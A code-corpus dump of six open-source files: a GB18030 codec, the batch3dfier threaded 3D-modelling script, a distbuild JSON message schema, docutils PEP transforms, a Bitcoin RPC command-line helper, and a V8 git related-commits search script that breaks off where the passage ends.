repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
vlinhd11/vlinhd11-android-scripting | python/src/Lib/encodings/gb18030.py | 816 | 1031 | #
# gb18030.py: Python Unicode Codec for GB18030
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_cn, codecs
import _multibytecodec as mbc
codec = _codecs_cn.getcodec('gb18030')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='gb18030',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| apache-2.0 |
balazsdukai/batch3dfier | batch3dfier/batch3dfierapp.py | 1 | 11644 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""The batch3dfier application."""
import os.path
import queue
import threading
import time
import warnings
import argparse
from subprocess import call
import logging
import yaml
from psycopg2 import sql
from batch3dfier import config
from batch3dfier import db
def parse_console_args():
# Parse command-line arguments -------------------------------------------
parser = argparse.ArgumentParser(description="Batch 3dfy 2D datasets.")
parser.add_argument(
"path",
help="The YAML config file for batch3dfier. See batch3dfier_config.yml for an example.")
parser.add_argument(
"-t", "--threads",
help="The number of threads to run.",
default=3,
type=int)
args = parser.parse_args()
args_in = {}
args_in['cfg_file'] = os.path.abspath(args.path)
args_in['cfg_dir'] = os.path.dirname(args_in['cfg_file'])
args_in['threads'] = args.threads
return(args_in)
def parse_config_yaml(args_in):
# =========================================================================
# User input and Settings
# =========================================================================
cfg = {}
stream = open(args_in['cfg_file'], "r")
cfg_stream = yaml.load(stream)
cfg['pc_file_name'] = cfg_stream["input_elevation"]["dataset_name"]
cfg['pc_dir'] = os.path.abspath(
cfg_stream["input_elevation"]["dataset_dir"])
cfg['pc_tile_case'] = cfg_stream["input_elevation"]["tile_case"]
cfg['polygons'] = cfg_stream['tile_index']['polygons']
cfg['elevation'] = cfg_stream['tile_index']['elevation']
OUTPUT_FORMAT = cfg_stream["output"]["format"]
if all(f not in OUTPUT_FORMAT.lower() for f in ["csv", "obj"]):
warnings.warn(
"\n No file format is appended to output. Currently only .obj or .csv is handled.\n")
cfg['output_format'] = OUTPUT_FORMAT
cfg['output_dir'] = os.path.abspath(cfg_stream["output"]["dir"])
if 'CSV-BUILDINGS-MULTIPLE' == cfg['output_format']:
cfg['out_schema'] = cfg_stream["output"]["schema"]
cfg['out_table'] = cfg_stream["output"]["table"]
else:
# OBJ is not imported into postgres
cfg['out_schema'] = None
cfg['out_table'] = None
pass
cfg['path_3dfier'] = cfg_stream["path_3dfier"]
try:
# in case user gave " " or "" for 'extent'
if len(cfg_stream["input_polygons"]["extent"]) <= 1:
EXTENT_FILE = None
cfg['extent_file'] = os.path.abspath(
cfg_stream["input_polygons"]["extent"])
cfg['tiles'] = None
except (NameError, AttributeError, TypeError):
tile_list = cfg_stream["input_polygons"]["tile_list"]
assert isinstance(
tile_list, list), "Please provide input for tile_list as a list: [...]"
cfg['tiles'] = tile_list
cfg['extent_file'] = None
# 'user_schema' is used for the '_clip3dfy_' and '_union' views, thus
# only use 'user_schema' if 'extent' is provided
cfg['tile_schema'] = cfg_stream["input_polygons"]["tile_schema"]
USER_SCHEMA = cfg_stream["input_polygons"]["user_schema"]
if (USER_SCHEMA is None) or (EXTENT_FILE is None):
cfg['user_schema'] = cfg['tile_schema']
# Connect to database ----------------------------------------------------
cfg['dbase'] = db.db(
dbname=cfg_stream["database"]["dbname"],
host=str(cfg_stream["database"]["host"]),
port=cfg_stream["database"]["port"],
user=cfg_stream["database"]["user"],
password=cfg_stream["database"]["pw"])
cfg['uniqueid'] = cfg_stream["input_polygons"]['uniqueid']
cfg['prefix_tile_footprint'] = cfg_stream["input_polygons"]["tile_prefix"]
return(cfg)
def main():
# Prefix for naming the clipped/united views. This value shouldn't be a
# substring in the pointcloud file names.
CLIP_PREFIX = "_clip3dfy_"
# used in call3dfier()
tile_out = None
ewkb = None
union_view = None
tiles_clipped = None
args_in = parse_console_args()
cfg = parse_config_yaml(args_in)
dbase = cfg['dbase']
tiles = cfg['tiles']
logfile = os.path.join(cfg['output_dir'], 'batch3dfier.log')
logging.basicConfig(filename=logfile,
filemode='a',
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
# =========================================================================
# Get tile list if 'extent' provided
# =========================================================================
# TODO: assert that CREATE/DROP allowed on TILE_SCHEMA and/or USER_SCHEMA
if cfg['extent_file']:
poly, ewkb = config.extent_to_ewkb(dbase, cfg['polygons'],
cfg['extent_file'])
tiles = config.get_2Dtiles(dbase, cfg['polygons'],
cfg['polygons']['fields'], ewkb)
# Get view names for tiles
tile_views = config.get_2Dtile_views(dbase, cfg['tile_schema'], tiles)
view_fields = config.get_view_fields(
dbase, cfg['tile_schema'], tile_views)
# clip 2D tiles to extent
tiles_clipped = config.clip_2Dtiles(dbase, cfg['user_schema'],
cfg['tile_schema'],
tile_views, poly,
CLIP_PREFIX,
view_fields)
# if the area of the extent is less than that of a tile, union the tiles is the
# extent spans over many
tile_area = config.get_2Dtile_area(dbase, cfg['polygons'])
if len(tiles_clipped) > 1 and poly.area < tile_area:
union_view = config.union_2Dtiles(dbase, cfg['user_schema'],
tiles_clipped, CLIP_PREFIX,
view_fields)
tile_out = "output_batch3dfier"
else:
union_view = []
elif tiles:
# ======================================================================
# Get tile list if 'tile_list' = 'all'
# ======================================================================
if 'all' in tiles:
schema_q = sql.Identifier(cfg['polygons']['schema'])
table_q = sql.Identifier(cfg['polygons']['table'])
unit_q = sql.Identifier(cfg['polygons']['fields']['unit_name'])
query = sql.SQL("""
SELECT {unit}
FROM {schema}.{table};
""").format(schema=schema_q, table=table_q,
unit=unit_q)
resultset = dbase.getQuery(query)
tiles = [tile[0] for tile in resultset]
tile_views = config.get_2Dtile_views(dbase, cfg['tile_schema'],
tiles)
else:
tile_views = config.get_2Dtile_views(dbase, cfg['tile_schema'],
tiles)
else:
TypeError("Please provide either 'extent' or 'tile_list' in config.")
# =========================================================================
# Process multiple threads
# reference: http://www.tutorialspoint.com/python3/python_multithreading.htm
# =========================================================================
exitFlag = 0
tiles_skipped = []
out_paths = []
class myThread (threading.Thread):
def __init__(self, threadID, name, q):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.q = q
def run(self):
print("Starting " + self.name)
process_data(self.name, self.q)
print("Exiting " + self.name)
def process_data(threadName, q):
while not exitFlag:
queueLock.acquire()
if not workQueue.empty():
tile = q.get()
queueLock.release()
print("%s processing %s" % (threadName, tile))
t = config.call_3dfier(
db=dbase,
tile=tile,
schema_tiles=cfg['user_schema'],
pc_file_name=cfg['pc_file_name'],
pc_tile_case=cfg['pc_tile_case'],
pc_dir=cfg['pc_dir'],
table_index_pc=cfg['elevation'],
fields_index_pc=cfg['elevation']['fields'],
table_index_footprint=cfg['polygons'],
fields_index_footprint=cfg['polygons']['fields'],
uniqueid=cfg['uniqueid'],
extent_ewkb=ewkb,
clip_prefix=CLIP_PREFIX,
prefix_tile_footprint=cfg['prefix_tile_footprint'],
yml_dir=args_in['cfg_dir'],
tile_out=tile_out,
output_format=cfg['output_format'],
output_dir=cfg['output_dir'],
path_3dfier=cfg['path_3dfier'],
thread=threadName)
if t['tile_skipped'] is not None:
tiles_skipped.append(t['tile_skipped'])
else:
out_paths.append(t['out_path'])
else:
queueLock.release()
time.sleep(1)
# Prep
threadList = ["Thread-" + str(t + 1) for t in range(args_in['threads'])]
queueLock = threading.Lock()
workQueue = queue.Queue(0)
threads = []
threadID = 1
# Create new threads
for tName in threadList:
thread = myThread(threadID, tName, workQueue)
thread.start()
threads.append(thread)
threadID += 1
# Fill the queue
queueLock.acquire()
if union_view:
# print("union_view is", union_view)
workQueue.put(union_view)
elif tiles_clipped:
# print("tiles_clipped is", tiles_clipped)
for tile in tiles_clipped:
workQueue.put(tile)
else:
# print("tile_views is", tile_views)
for tile in tile_views:
workQueue.put(tile)
queueLock.release()
# Wait for queue to empty
while not workQueue.empty():
pass
# Notify threads it's time to exit
exitFlag = 1
# Wait for all threads to complete
for t in threads:
t.join()
print("Exiting Main Thread")
# Drop temporary views that reference the clipped extent
if union_view:
tiles_clipped.append(union_view)
if tiles_clipped:
config.drop_2Dtiles(
dbase,
cfg['user_schema'],
views_to_drop=tiles_clipped)
# Delete temporary config files
yml_cfg = [
os.path.join(
args_in['cfg_dir'],
t +
"_config.yml") for t in threadList]
command = "rm"
for c in yml_cfg:
command = command + " " + c
call(command, shell=True)
# =========================================================================
# Reporting
# =========================================================================
tiles = set(tiles)
tiles_skipped = set(tiles_skipped)
logging.info("Total number of tiles processed: %s",
str(len(tiles.difference(tiles_skipped))))
logging.info("Tiles skipped: %s", tiles_skipped)
if __name__ == '__main__':
main()
| gpl-3.0 |
perryl/morph | distbuild/protocol.py | 2 | 3506 | # distbuild/protocol.py -- abstractions for the JSON messages
#
# Copyright (C) 2012, 2014-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
'''Construct protocol message objects (dicts).'''
# Version refers to an integer that should be incremented by one each time a
# time a change is introduced that would break server/initiator compatibility
VERSION = 4
_required_fields = {
'build-request': [
'id',
'repo',
'ref',
'morphology',
'partial',
'protocol_version',
'allow_detach',
],
'build-progress': [
'id',
'message',
],
'step-started': [
'id',
'step_name',
'worker_name',
],
'build-started': [
'id',
],
'step-already-started': [
'id',
'step_name',
'worker_name',
],
'step-output': [
'id',
'step_name',
'stdout',
'stderr',
],
'step-finished': [
'id',
'step_name',
'worker_name',
],
'step-failed': [
'id',
'step_name',
],
'build-finished': [
'id',
'urls',
],
'build-failed': [
'id',
'reason',
],
'build-cancelled': [
'id',
],
'exec-request': [
'id',
'argv',
'stdin_contents',
],
'exec-cancel': [
'id',
],
'http-request': [
'id',
'url',
'method',
'headers',
'body',
],
'list-requests': [
'id',
'protocol_version',
],
'request-output': [
'message',
],
'build-cancel': [
'id',
'protocol_version',
],
'build-status': [
'id',
'protocol_version',
],
'graphing-started': [
'id',
],
'graphing-finished': [
'id'
],
'cache-state': [
'id',
'unbuilt',
'total'
]
}
_optional_fields = {
'build-request': [
'original_ref',
'component_names'
]
}
def _validate(message_type, **kwargs):
required_fields = _required_fields[message_type]
optional_fields = _optional_fields.get(message_type, [])
known_types = _required_fields.keys()
assert message_type in known_types
for name in required_fields:
assert name in kwargs, 'field %s is required' % name
for name in kwargs:
assert (name in required_fields or name in optional_fields), \
'field %s is not allowed' % name
def message(message_type, **kwargs):
_validate(message_type, **kwargs)
msg = dict(kwargs)
msg['type'] = message_type
return msg
def is_valid_message(msg):
if 'type' not in msg:
return False
msg_type = msg['type']
del msg['type']
try:
_validate(msg_type, **msg)
return True
except AssertionError:
return False
finally:
msg['type'] = msg_type
| gpl-2.0 |
timonwong/OmniMarkupPreviewer | OmniMarkupLib/Renderers/libs/python3/docutils/transforms/peps.py | 4 | 11023 | # $Id$
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
Transforms for PEP processing.
- `Headers`: Used to transform a PEP's initial RFC-2822 header. It remains a
field list, but some entries get processed.
- `Contents`: Auto-inserts a table of contents.
- `PEPZero`: Special processing for PEP 0.
"""
__docformat__ = 'reStructuredText'
import sys
import os
import re
import time
from docutils import nodes, utils, languages
from docutils import ApplicationError, DataError
from docutils.transforms import Transform, TransformError
from docutils.transforms import parts, references, misc
class Headers(Transform):
"""
Process fields in a PEP's initial RFC-2822 header.
"""
default_priority = 360
pep_url = 'pep-%04d'
pep_cvs_url = ('http://svn.python.org/view/*checkout*'
'/peps/trunk/pep-%04d.txt')
rcs_keyword_substitutions = (
(re.compile(r'\$' r'RCSfile: (.+),v \$$', re.IGNORECASE), r'\1'),
(re.compile(r'\$[a-zA-Z]+: (.+) \$$'), r'\1'),)
def apply(self):
if not len(self.document):
# @@@ replace these DataErrors with proper system messages
raise DataError('Document tree is empty.')
header = self.document[0]
if not isinstance(header, nodes.field_list) or \
'rfc2822' not in header['classes']:
raise DataError('Document does not begin with an RFC-2822 '
'header; it is not a PEP.')
pep = None
for field in header:
if field[0].astext().lower() == 'pep': # should be the first field
value = field[1].astext()
try:
pep = int(value)
cvs_url = self.pep_cvs_url % pep
except ValueError:
pep = value
cvs_url = None
msg = self.document.reporter.warning(
'"PEP" header must contain an integer; "%s" is an '
'invalid value.' % pep, base_node=field)
msgid = self.document.set_id(msg)
prb = nodes.problematic(value, value or '(none)',
refid=msgid)
prbid = self.document.set_id(prb)
msg.add_backref(prbid)
if len(field[1]):
field[1][0][:] = [prb]
else:
field[1] += nodes.paragraph('', '', prb)
break
if pep is None:
raise DataError('Document does not contain an RFC-2822 "PEP" '
'header.')
if pep == 0:
# Special processing for PEP 0.
pending = nodes.pending(PEPZero)
self.document.insert(1, pending)
self.document.note_pending(pending)
if len(header) < 2 or header[1][0].astext().lower() != 'title':
raise DataError('No title!')
for field in header:
name = field[0].astext().lower()
body = field[1]
if len(body) > 1:
raise DataError('PEP header field body contains multiple '
'elements:\n%s' % field.pformat(level=1))
elif len(body) == 1:
if not isinstance(body[0], nodes.paragraph):
raise DataError('PEP header field body may only contain '
'a single paragraph:\n%s'
% field.pformat(level=1))
elif name == 'last-modified':
date = time.strftime(
'%d-%b-%Y',
time.localtime(os.stat(self.document['source'])[8]))
if cvs_url:
body += nodes.paragraph(
'', '', nodes.reference('', date, refuri=cvs_url))
else:
# empty
continue
para = body[0]
if name == 'author':
for node in para:
if isinstance(node, nodes.reference):
node.replace_self(mask_email(node))
elif name == 'discussions-to':
for node in para:
if isinstance(node, nodes.reference):
node.replace_self(mask_email(node, pep))
elif name in ('replaces', 'replaced-by', 'requires'):
newbody = []
space = nodes.Text(' ')
for refpep in re.split(',?\s+', body.astext()):
pepno = int(refpep)
newbody.append(nodes.reference(
refpep, refpep,
refuri=(self.document.settings.pep_base_url
+ self.pep_url % pepno)))
newbody.append(space)
para[:] = newbody[:-1] # drop trailing space
elif name == 'last-modified':
utils.clean_rcs_keywords(para, self.rcs_keyword_substitutions)
if cvs_url:
date = para.astext()
para[:] = [nodes.reference('', date, refuri=cvs_url)]
elif name == 'content-type':
pep_type = para.astext()
uri = self.document.settings.pep_base_url + self.pep_url % 12
para[:] = [nodes.reference('', pep_type, refuri=uri)]
elif name == 'version' and len(body):
utils.clean_rcs_keywords(para, self.rcs_keyword_substitutions)
class Contents(Transform):
"""
Insert an empty table of contents topic and a transform placeholder into
the document after the RFC 2822 header.
"""
default_priority = 380
def apply(self):
language = languages.get_language(self.document.settings.language_code,
self.document.reporter)
name = language.labels['contents']
title = nodes.title('', name)
topic = nodes.topic('', title, classes=['contents'])
name = nodes.fully_normalize_name(name)
if not self.document.has_name(name):
topic['names'].append(name)
self.document.note_implicit_target(topic)
pending = nodes.pending(parts.Contents)
topic += pending
self.document.insert(1, topic)
self.document.note_pending(pending)
class TargetNotes(Transform):
"""
Locate the "References" section, insert a placeholder for an external
target footnote insertion transform at the end, and schedule the
transform to run immediately.
"""
default_priority = 520
def apply(self):
doc = self.document
i = len(doc) - 1
refsect = copyright = None
while i >= 0 and isinstance(doc[i], nodes.section):
title_words = doc[i][0].astext().lower().split()
if 'references' in title_words:
refsect = doc[i]
break
elif 'copyright' in title_words:
copyright = i
i -= 1
if not refsect:
refsect = nodes.section()
refsect += nodes.title('', 'References')
doc.set_id(refsect)
if copyright:
# Put the new "References" section before "Copyright":
doc.insert(copyright, refsect)
else:
# Put the new "References" section at end of doc:
doc.append(refsect)
pending = nodes.pending(references.TargetNotes)
refsect.append(pending)
self.document.note_pending(pending, 0)
pending = nodes.pending(misc.CallBack,
details={'callback': self.cleanup_callback})
refsect.append(pending)
self.document.note_pending(pending, 1)
def cleanup_callback(self, pending):
"""
Remove an empty "References" section.
Called after the `references.TargetNotes` transform is complete.
"""
if len(pending.parent) == 2: # <title> and <pending>
pending.parent.parent.remove(pending.parent)
class PEPZero(Transform):
"""
Special processing for PEP 0.
"""
default_priority =760
def apply(self):
visitor = PEPZeroSpecial(self.document)
self.document.walk(visitor)
self.startnode.parent.remove(self.startnode)
class PEPZeroSpecial(nodes.SparseNodeVisitor):
"""
Perform the special processing needed by PEP 0:
- Mask email addresses.
- Link PEP numbers in the second column of 4-column tables to the PEPs
themselves.
"""
pep_url = Headers.pep_url
def unknown_visit(self, node):
pass
def visit_reference(self, node):
node.replace_self(mask_email(node))
def visit_field_list(self, node):
if 'rfc2822' in node['classes']:
raise nodes.SkipNode
def visit_tgroup(self, node):
self.pep_table = node['cols'] == 4
self.entry = 0
def visit_colspec(self, node):
self.entry += 1
if self.pep_table and self.entry == 2:
node['classes'].append('num')
def visit_row(self, node):
self.entry = 0
def visit_entry(self, node):
self.entry += 1
if self.pep_table and self.entry == 2 and len(node) == 1:
node['classes'].append('num')
p = node[0]
if isinstance(p, nodes.paragraph) and len(p) == 1:
text = p.astext()
try:
pep = int(text)
ref = (self.document.settings.pep_base_url
+ self.pep_url % pep)
p[0] = nodes.reference(text, text, refuri=ref)
except ValueError:
pass
non_masked_addresses = ('peps@python.org',
'python-list@python.org',
'python-dev@python.org')
def mask_email(ref, pepno=None):
"""
Mask the email address in `ref` and return a replacement node.
`ref` is returned unchanged if it contains no email address.
For email addresses such as "user@host", mask the address as "user at
host" (text) to thwart simple email address harvesters (except for those
listed in `non_masked_addresses`). If a PEP number (`pepno`) is given,
return a reference including a default email subject.
"""
if ref.hasattr('refuri') and ref['refuri'].startswith('mailto:'):
if ref['refuri'][8:] in non_masked_addresses:
replacement = ref[0]
else:
replacement_text = ref.astext().replace('@', ' at ')
replacement = nodes.raw('', replacement_text, format='html')
if pepno is None:
return replacement
else:
ref['refuri'] += '?subject=PEP%%20%s' % pepno
ref[:] = [replacement]
return ref
else:
return ref
| mit |
CCPorg/ALU-AluminiumCoin-Original | contrib/bitrpc/bitrpc.py | 2348 | 7835 | from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:8332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:8332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported" | mit |
macchina-io/macchina.io | platform/JS/V8/v8/tools/release/search_related_commits.py | 22 | 6486 | #!/usr/bin/env python
# Copyright 2015 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import operator
import os
import re
from sets import Set
from subprocess import Popen, PIPE
import sys
def search_all_related_commits(
git_working_dir, start_hash, until, separator, verbose=False):
all_commits_raw = _find_commits_inbetween(
start_hash, until, git_working_dir, verbose)
if verbose:
print "All commits between <of> and <until>: " + all_commits_raw
# Adding start hash too
all_commits = [start_hash]
all_commits.extend(all_commits_raw.splitlines())
all_related_commits = {}
already_treated_commits = Set([])
for commit in all_commits:
if commit in already_treated_commits:
continue
related_commits = _search_related_commits(
git_working_dir, commit, until, separator, verbose)
if len(related_commits) > 0:
all_related_commits[commit] = related_commits
already_treated_commits.update(related_commits)
already_treated_commits.update(commit)
return all_related_commits
def _search_related_commits(
git_working_dir, start_hash, until, separator, verbose=False):
if separator:
commits_between = _find_commits_inbetween(
start_hash, separator, git_working_dir, verbose)
if commits_between == "":
return []
# Extract commit position
original_message = git_execute(
git_working_dir,
["show", "-s", "--format=%B", start_hash],
verbose)
title = original_message.splitlines()[0]
matches = re.search("(\{#)([0-9]*)(\})", original_message)
if not matches:
return []
commit_position = matches.group(2)
if verbose:
print "1.) Commit position to look for: " + commit_position
search_range = start_hash + ".." + until
def git_args(grep_pattern):
return [
"log",
"--reverse",
"--grep=" + grep_pattern,
"--format=%H",
search_range,
]
found_by_hash = git_execute(
git_working_dir, git_args(start_hash), verbose).strip()
if verbose:
print "2.) Found by hash: " + found_by_hash
found_by_commit_pos = git_execute(
git_working_dir, git_args(commit_position), verbose).strip()
if verbose:
print "3.) Found by commit position: " + found_by_commit_pos
# Replace brackets or else they are wrongly interpreted by --grep
title = title.replace("[", "\\[")
title = title.replace("]", "\\]")
found_by_title = git_execute(
git_working_dir, git_args(title), verbose).strip()
if verbose:
print "4.) Found by title: " + found_by_title
hits = (
_convert_to_array(found_by_hash) +
_convert_to_array(found_by_commit_pos) +
_convert_to_array(found_by_title))
hits = _remove_duplicates(hits)
if separator:
for current_hit in hits:
commits_between = _find_commits_inbetween(
separator, current_hit, git_working_dir, verbose)
if commits_between != "":
return hits
return []
return hits
def _find_commits_inbetween(start_hash, end_hash, git_working_dir, verbose):
commits_between = git_execute(
git_working_dir,
["rev-list", "--reverse", start_hash + ".." + end_hash],
verbose)
return commits_between.strip()
def _convert_to_array(string_of_hashes):
return string_of_hashes.splitlines()
def _remove_duplicates(array):
no_duplicates = []
for current in array:
if not current in no_duplicates:
no_duplicates.append(current)
return no_duplicates
def git_execute(working_dir, args, verbose=False):
command = ["git", "-C", working_dir] + args
if verbose:
print "Git working dir: " + working_dir
print "Executing git command:" + str(command)
p = Popen(args=command, stdin=PIPE,
stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
rc = p.returncode
if rc != 0:
raise Exception(err)
if verbose:
print "Git return value: " + output
return output
def _pretty_print_entry(hash, git_dir, pre_text, verbose):
text_to_print = git_execute(
git_dir,
["show",
"--quiet",
"--date=iso",
hash,
"--format=%ad # %H # %s"],
verbose)
return pre_text + text_to_print.strip()
def main(options):
all_related_commits = search_all_related_commits(
options.git_dir,
options.of[0],
options.until[0],
options.separator,
options.verbose)
sort_key = lambda x: (
git_execute(
options.git_dir,
["show", "--quiet", "--date=iso", x, "--format=%ad"],
options.verbose)).strip()
high_level_commits = sorted(all_related_commits.keys(), key=sort_key)
for current_key in high_level_commits:
if options.prettyprint:
yield _pretty_print_entry(
current_key,
options.git_dir,
"+",
options.verbose)
else:
yield "+" + current_key
found_commits = all_related_commits[current_key]
for current_commit in found_commits:
if options.prettyprint:
yield _pretty_print_entry(
current_commit,
options.git_dir,
"| ",
options.verbose)
else:
yield "| " + current_commit
if __name__ == "__main__": # pragma: no cover
parser = argparse.ArgumentParser(
"This tool analyzes the commit range between <of> and <until>. "
"It finds commits which belong together e.g. Implement/Revert pairs and "
"Implement/Port/Revert triples. All supplied hashes need to be "
"from the same branch e.g. master.")
parser.add_argument("-g", "--git-dir", required=False, default=".",
help="The path to your git working directory.")
parser.add_argument("--verbose", action="store_true",
help="Enables a very verbose output")
parser.add_argument("of", nargs=1,
help="Hash of the commit to be searched.")
parser.add_argument("until", nargs=1,
help="Commit when searching should stop")
parser.add_argument("--separator", required=False,
help="The script will only list related commits "
"which are separated by hash <--separator>.")
parser.add_argument("--prettyprint", action="store_true",
help="Pretty prints the output")
args = sys.argv[1:]
